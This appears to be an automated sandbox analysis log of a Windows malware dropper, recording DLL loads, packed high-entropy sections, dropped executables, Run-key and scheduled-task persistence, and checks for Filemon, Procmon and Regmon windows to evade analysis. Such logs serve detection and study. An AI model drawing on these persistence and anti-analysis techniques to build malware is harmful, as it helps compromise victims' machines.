Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: file.exe Static file information: File size 1930752 > 1048576
Source: file.exe Static PE information: Raw size of egarwnqv is bigger than: 0x100000 < 0x1a5a00
Source: Binary string: webauthn.pdb source: firefox.exe, 0000001C.00000003.2801056711.000001DEEBF8E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\applaunch.pdb@ source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\applaunch.pdb]q03f5 source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: SxQyhJr.exe, 00000007.00000002.2452771154.0000000006350000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbL source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: SxQyhJr.exe, 00000007.00000002.2452771154.0000000006350000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Windows\applaunch.pdbpdbnch.pdbdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\applaunch.pdb; source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.00000000052A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: webauthn.pdbGCTL source: firefox.exe, 0000001C.00000003.2801056711.000001DEEBF8E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: a6f0d09f38.exe, 0000000D.00000003.2893559626.00000000084E0000.00000004.00001000.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2987390171.00000000063D2000.00000040.00000800.00020000.00000000.sdmp, 8b82d73f70.exe, 00000020.00000002.2915080351.00000000003A2000.00000040.00000001.01000000.0000001A.sdmp, 8b82d73f70.exe, 00000020.00000003.2780938560.00000000050C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: mscorlib.pdbamD source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n4C:\Windows\applaunch.pdbd source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\applaunch.pdb]qKeyT source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: o.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: applaunch.pdbeP/ source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: applaunch.pdblaunch.pdbpdbnch.pdb.0.30319\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: symbols\exe\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb, source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbs1 source: AppLaunch.exe, 00000008.00000002.2944711279.00000000052A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbpdbtem.pdbU source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: oC:\Windows\Microsoft.NET\Framework\v4.0.30319\applaunch.pdbxX($ source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: %%.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbV source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .PDB source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.PDBp source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.700000.0.unpack :EW;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 1.2.skotes.exe.6e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.6e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.6e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;egarwnqv:EW;kktuolht:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Unpacked PE file: 13.2.a6f0d09f38.exe.600000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bioduybg:EW;eaqvzvci:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bioduybg:EW;eaqvzvci:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Unpacked PE file: 14.2.b5da647ae3.exe.2c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sqwnkuay:EW;dlrscmkp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sqwnkuay:EW;dlrscmkp:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Unpacked PE file: 32.2.8b82d73f70.exe.3a0000.0.unpack :EW;.rsrc:W;.idata :W;xbmfzvhb:EW;ztggrlpz:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Unpacked PE file: 34.2.98a7b9f337.exe.e60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jyijtabb:EW;ckbvpooz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jyijtabb:EW;ckbvpooz:EW;.taggant:EW;
Source: 7.2.SxQyhJr.exe.4108370.1.raw.unpack, FilteredInspector.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 7.2.SxQyhJr.exe.6300000.4.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 7.2.SxQyhJr.exe.6300000.4.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 7.2.SxQyhJr.exe.6300000.4.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 7.2.SxQyhJr.exe.6300000.4.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 7.2.SxQyhJr.exe.6300000.4.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: 7.2.SxQyhJr.exe.4108370.1.raw.unpack, FieldCalculator.cs .Net Code: CalculateInterruptibleCalculator System.AppDomain.Load(byte[])
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: Yara match File source: 7.2.SxQyhJr.exe.6240000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.2452245090.0000000006240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2431381161.0000000003059000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SxQyhJr.exe PID: 7396, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 2720, type: MEMORYSTR
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: SxQyhJr[1].exe.6.dr Static PE information: real checksum: 0x0 should be: 0x16d4cc
Source: random[1].exe.6.dr Static PE information: real checksum: 0x1c9b3a should be: 0x1c9ff1
Source: SxQyhJr.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x16d4cc
Source: random[1].exe2.6.dr Static PE information: real checksum: 0x2a3ab9 should be: 0x2a70e2
Source: 98a7b9f337.exe.6.dr Static PE information: real checksum: 0x44720a should be: 0x446939
Source: a6f0d09f38.exe.6.dr Static PE information: real checksum: 0x1c9b3a should be: 0x1c9ff1
Source: file.exe Static PE information: real checksum: 0x1d9764 should be: 0x1e1ec7
Source: b5da647ae3.exe.6.dr Static PE information: real checksum: 0x1ce583 should be: 0x1c9bf3
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1d9764 should be: 0x1e1ec7
Source: random[1].exe0.6.dr Static PE information: real checksum: 0x1ce583 should be: 0x1c9bf3
Source: random[2].exe.6.dr Static PE information: real checksum: 0x44720a should be: 0x446939
Source: 8b82d73f70.exe.6.dr Static PE information: real checksum: 0x2a3ab9 should be: 0x2a70e2
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: egarwnqv
Source: file.exe Static PE information: section name: kktuolht
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: egarwnqv
Source: skotes.exe.0.dr Static PE information: section name: kktuolht
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[2].exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name: .idata
Source: random[2].exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name: jyijtabb
Source: random[2].exe.6.dr Static PE information: section name: ckbvpooz
Source: random[2].exe.6.dr Static PE information: section name: .taggant
Source: 98a7b9f337.exe.6.dr Static PE information: section name:
Source: 98a7b9f337.exe.6.dr Static PE information: section name: .idata
Source: 98a7b9f337.exe.6.dr Static PE information: section name:
Source: 98a7b9f337.exe.6.dr Static PE information: section name: jyijtabb
Source: 98a7b9f337.exe.6.dr Static PE information: section name: ckbvpooz
Source: 98a7b9f337.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: bioduybg
Source: random[1].exe.6.dr Static PE information: section name: eaqvzvci
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: a6f0d09f38.exe.6.dr Static PE information: section name:
Source: a6f0d09f38.exe.6.dr Static PE information: section name: .idata
Source: a6f0d09f38.exe.6.dr Static PE information: section name:
Source: a6f0d09f38.exe.6.dr Static PE information: section name: bioduybg
Source: a6f0d09f38.exe.6.dr Static PE information: section name: eaqvzvci
Source: a6f0d09f38.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: sqwnkuay
Source: random[1].exe0.6.dr Static PE information: section name: dlrscmkp
Source: random[1].exe0.6.dr Static PE information: section name: .taggant
Source: b5da647ae3.exe.6.dr Static PE information: section name:
Source: b5da647ae3.exe.6.dr Static PE information: section name: .idata
Source: b5da647ae3.exe.6.dr Static PE information: section name:
Source: b5da647ae3.exe.6.dr Static PE information: section name: sqwnkuay
Source: b5da647ae3.exe.6.dr Static PE information: section name: dlrscmkp
Source: b5da647ae3.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe2.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name: .idata
Source: random[1].exe2.6.dr Static PE information: section name: xbmfzvhb
Source: random[1].exe2.6.dr Static PE information: section name: ztggrlpz
Source: random[1].exe2.6.dr Static PE information: section name: .taggant
Source: 8b82d73f70.exe.6.dr Static PE information: section name:
Source: 8b82d73f70.exe.6.dr Static PE information: section name: .idata
Source: 8b82d73f70.exe.6.dr Static PE information: section name: xbmfzvhb
Source: 8b82d73f70.exe.6.dr Static PE information: section name: ztggrlpz
Source: 8b82d73f70.exe.6.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_050F03E2 push cs; ret 0_2_050F03F3
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_006FD91C push ecx; ret 6_2_006FD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00989680 push ebp; mov dword ptr [esp], 757EDB71h 6_2_009896AF
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00989680 push edi; mov dword ptr [esp], 57E939DFh 6_2_00989703
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00989680 push eax; mov dword ptr [esp], esi 6_2_0098973C
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00989680 push ecx; mov dword ptr [esp], edi 6_2_00989783
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_0158E988 push esp; retf 7_2_0158E9A6
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_0158EE80 pushfd ; retf 7_2_0158EE81
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061E8658 push 00000037h; ret 7_2_061E865F
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061E9E48 push es; iretd 7_2_061E9E58
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061E7E94 push FFFFFF90h; retf 7_2_061E7E9D
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061E7F7C push E803FE7Bh; ret 7_2_061E7F81
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061E93C4 push es; ret 7_2_061E93C8
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061F9CE9 push es; ret 7_2_061F9CEC
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_061FB560 push es; retf 7_2_061FB57C
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06539F26 push es; iretd 7_2_06539F28
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06534C66 push es; retf 7_2_06534CA0
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_065310FC push eax; retf 7_2_06531103
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_06534CA1 push es; retf 7_2_06534CA4
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_065365EA push es; retf 7_2_06536650
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 7_2_066364FA push ebx; iretd 7_2_0663650A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063DE886 push edi; mov dword ptr [esp], 2ED07954h 13_2_063DE820
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063DE886 push edi; mov dword ptr [esp], eax 13_2_063DEE07
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063DE886 push edx; mov dword ptr [esp], ebx 13_2_063DEE13
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063DE886 push eax; mov dword ptr [esp], 7B0CE75Ah 13_2_063DF2C5
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063DE886 push ecx; mov dword ptr [esp], esi 13_2_063DF407
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E1639 push eax; mov dword ptr [esp], 3EF51D66h 13_2_063E232F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E0E2C push 1C38B7BDh; mov dword ptr [esp], esi 13_2_063E0E3A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E0E2C push eax; mov dword ptr [esp], 3D4032C1h 13_2_063E0E3E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E0E2C push ecx; mov dword ptr [esp], 4E53CE1Bh 13_2_063E21B0
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E460F push 038564DAh; mov dword ptr [esp], edx 13_2_063E4626
Source: file.exe Static PE information: section name: entropy: 7.980771158039659
Source: file.exe Static PE information: section name: egarwnqv entropy: 7.954289252151083
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.980771158039659
Source: skotes.exe.0.dr Static PE information: section name: egarwnqv entropy: 7.954289252151083
Source: random[2].exe.6.dr Static PE information: section name: jyijtabb entropy: 7.954103030134678
Source: SxQyhJr[1].exe.6.dr Static PE information: section name: .text entropy: 7.945671182559719
Source: 98a7b9f337.exe.6.dr Static PE information: section name: jyijtabb entropy: 7.954103030134678
Source: SxQyhJr.exe.6.dr Static PE information: section name: .text entropy: 7.945671182559719
Source: random[1].exe.6.dr Static PE information: section name: entropy: 7.969899728729919
Source: random[1].exe.6.dr Static PE information: section name: bioduybg entropy: 7.952935716114438
Source: a6f0d09f38.exe.6.dr Static PE information: section name: entropy: 7.969899728729919
Source: a6f0d09f38.exe.6.dr Static PE information: section name: bioduybg entropy: 7.952935716114438
Source: random[1].exe0.6.dr Static PE information: section name: sqwnkuay entropy: 7.954864550900061
Source: b5da647ae3.exe.6.dr Static PE information: section name: sqwnkuay entropy: 7.954864550900061
Source: random[1].exe2.6.dr Static PE information: section name: entropy: 7.764448278674302
Source: 8b82d73f70.exe.6.dr Static PE information: section name: entropy: 7.764448278674302
Source: 7.2.SxQyhJr.exe.5a60000.2.raw.unpack, asXkdacxwMNyu0Oyerq.cs High entropy of concatenated method names: 'NTwZu9ZRgC', 'icGyu4GKsds5wJKvHYY', 'cTCRSxGtnAXV86jeErZ', 'I6XQDo3yO8mwH4krEjW', 'uhBHhL3AmI1h0DwFiAR'
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SxQyhJr[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8b82d73f70.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a6f0d09f38.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b5da647ae3.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6e1fbaaba5.exe
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
